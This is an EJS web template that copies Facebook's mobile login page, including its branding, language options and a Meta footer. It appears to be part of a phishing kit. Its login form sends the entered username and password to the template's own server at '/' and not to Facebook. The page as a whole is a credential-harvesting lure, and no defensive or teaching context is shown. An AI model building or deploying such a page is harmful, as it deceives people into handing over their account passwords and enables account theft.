<%- include('partial/header') %>

    <div class="box">
        <div class="top flex flex-center flex-only-center-align font-sans-serif s-font">
          <p>Get Facebook for Android and browse faster</p>
        </div>
        <div class="sign_in font-sans-serif flex flex-dir-h flex-center">
          <h2 class="margin-b">facebook</h2>
          <form class="flex flex-dir-h" action="/" method="post">
            <input type="text" placeholder="Mobile number or email address" name="username">
            <input type="password" placeholder="Password" name="password">
            <button class="btn" type="submit">Log In</button>
          </form>
          <h5>Forgotten password?</h5>
          <ul>
            <div><hr></div>
            <div class="center-or">or</div>
            <div><hr></div>
          </ul>
          <button class="cre-ne-acc" type="submit">Create new account</button>
        </div>
        <div class="lang-opt flex font-sans-serif ss-font">
            <ul class="flex-dir-h">
              <li style="color:#999; font-weight:bold;">English(UK)</li>
              <li>हिंदी</li>
              <li>नेपाली</li>
              <li>Español</li>
            </ul>
            <ul class="flex-dir-h">
              <li>বাংলা</li>
              <li>اردو</li>
              <li></li>
            </ul>
        </div>
        
        <div class="footer font-sans-serif ss-font">Meta &#169 2023</div>
      </div>
<%- include('partial/footer') %>